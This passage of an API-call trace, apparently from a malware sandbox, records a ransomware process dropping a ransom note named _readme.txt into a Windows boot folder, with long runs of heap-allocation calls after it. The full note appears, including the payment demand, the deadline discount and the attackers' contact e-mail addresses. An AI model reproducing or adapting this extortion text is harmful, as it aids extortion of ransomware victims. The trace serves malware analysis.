our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.766] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.767] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.767] CloseHandle (hObject=0x6f0) returned 1 [0142.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.768] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b26f90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b26f90, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.768] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b26f90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b26f90, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.768] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.768] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b26f90, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b26f90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b26f90, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.768] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b26f90, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b26f90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b26f90, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.768] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.769] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.774] RtlAllocateHeap 